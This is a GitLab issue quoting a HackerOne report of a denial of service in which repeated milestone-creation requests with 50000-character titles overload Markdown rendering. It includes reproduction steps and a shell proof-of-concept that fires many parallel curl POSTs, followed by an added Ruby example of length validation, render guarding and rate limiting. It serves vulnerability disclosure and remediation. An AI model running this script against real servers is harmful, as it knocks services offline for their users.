DoS with Markdown rendering long lines
This issue describes multiple H1 reports, which you can see in the related issues. All will probably have the same fix and so I've closed the others, but we should check all of the cases in our testing.
Link: https://hackerone.com/reports/415988
By: @8ayac
Details:
Description
An attacker can cause a DoS by continuously sending a request to create a new Milestone with a title 50000 characters in length.
Steps To Reproduce:
- Sign in to GitLab.
- Create a project.
- Go to "http(s)://{GitLab Host}/{userid}/{Project Name}/milestones/new".
- Fill out "Title" form with 'A'.
- Click "Create milestone" button.
- Intercept the request.
- Change the value of parameter "title" to 'A'*50000.
- Send the request.
- Repeat the request from step 8 many times.
Result: Cannot access the GitLab service. (I confirmed that the CPU usage rate of the server had risen to over 90%.)
You can reproduce this easily by using the following script. (Replace [PLACEHOLDER] with your own values.)
#!/bin/sh
gitlabHost=$1
projectURL=$2
charBlock=$(head -c 50000 /dev/zero | sed -e 's/\x00/A/g')
curl=`cat << EOS
curl
--silent
--output /dev/null
${projectURL}/milestones
--header 'Host: ${gitlabHost}'
-b '_gitlab_session=[PLACEHOLDER]'
--data-binary 'utf8=%E2%9C%93&authenticity_token=[PLACEHOLDER]&milestone%5Btitle%5D=${charBlock}&milestone%5Bdescription%5D=&milestone%5Bstart_date%5D=&milestone%5Bdue_date%5D='
EOS`
for i in `seq $3`
do
eval ${curl}&
done
Impact
Users will not be able to use the entire service.
Thanks.
Timeline: 2018-09-28 22:41:00 +0000: @8ayac (report title updated)
2018-09-28 22:44:30 +0000: @8ayac (comment) Usage of the script:
$ ./poc.sh [GitLab Host] [URL of target project] [Repeat count of request]
dev.gitlab.org issue: https://dev.gitlab.org/gitlab/gitlabhq/issues/2766
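Added example, not GitLab's code and not the fix tracked in the linked issues: the defensive pattern the report points at is to bound input size before any Markdown rendering happens, and to bound how often one session can submit the create-milestone request. The limits, the function names, the RequestRateLimiter class and the constructed inputs below are assumptions for illustration; the renderer is injected as a plain callable so the guard runs without a Markdown library.

```ruby
# Added example, not GitLab's code: size limits enforced before any Markdown
# rendering, plus a per-session request limiter. All limits are assumptions.
MAX_TITLE_LENGTH = 255
MAX_MARKDOWN_LINE_LENGTH = 10_000
MAX_MARKDOWN_TOTAL_LENGTH = 1_000_000

# Returns an array of error messages; empty when the params are acceptable.
# Runs before the record is saved and before anything is rendered, so a
# 50000-character title is rejected without touching the Markdown pipeline.
def validate_milestone_params(params)
  errors = []
  title = params.fetch("title", "").to_s
  description = params.fetch("description", "").to_s

  if title.strip.empty?
    errors << "title can't be blank"
  elsif title.length > MAX_TITLE_LENGTH
    errors << "title is too long (maximum is #{MAX_TITLE_LENGTH} characters)"
  end

  if description.length > MAX_MARKDOWN_TOTAL_LENGTH
    errors << "description is too long (maximum is #{MAX_MARKDOWN_TOTAL_LENGTH} characters)"
  end

  # Per-line cap: rendering cost grows with line length, not just total size.
  description.each_line.with_index(1) do |line, n|
    next unless line.chomp.length > MAX_MARKDOWN_LINE_LENGTH
    errors << "description line #{n} exceeds #{MAX_MARKDOWN_LINE_LENGTH} characters"
    break
  end

  errors
end

# Second layer for content that is already stored (or arrives through another
# path): over-long lines are cut before they reach the renderer. `renderer` is
# any callable taking Markdown text; it is injected so the guard is testable.
def render_markdown_guarded(text, renderer)
  bounded = text.each_line.map do |line|
    body = line.chomp
    if body.length > MAX_MARKDOWN_LINE_LENGTH
      body[0, MAX_MARKDOWN_LINE_LENGTH] + " [truncated]"
    else
      body
    end
  end
  renderer.call(bounded.join("\n"))
end

# Sliding-log rate limiter keyed by session (or user): caps how many
# create-milestone requests one caller may submit per window. The clock is
# injectable so the behaviour can be tested deterministically.
class RequestRateLimiter
  def initialize(limit:, window_seconds:, clock: nil)
    @limit = limit
    @window = window_seconds
    @clock = clock || -> { Process.clock_gettime(Process::CLOCK_MONOTONIC) }
    @events = Hash.new { |h, k| h[k] = [] }
  end

  # true when the request may proceed, false when the caller is over the limit.
  def allow?(key)
    now = @clock.call
    log = @events[key]
    log.reject! { |t| t <= now - @window } # forget events outside the window
    return false if log.size >= @limit
    log << now
    true
  end
end

if __FILE__ == $PROGRAM_NAME
  # Constructed input mirroring the report: a 50000-character title.
  oversized = { "title" => "A" * 50_000, "description" => "" }
  puts validate_milestone_params(oversized).inspect
  limiter = RequestRateLimiter.new(limit: 5, window_seconds: 60)
  puts (1..6).map { limiter.allow?("session-1") }.inspect
end
```

The validation rejects the oversized title before the Markdown step ever runs, which is the cheap place to stop it; the render guard covers rows that were written before the limit existed; the limiter is a separate control for the "repeat many times" part of the report and does nothing about a single expensive request on its own.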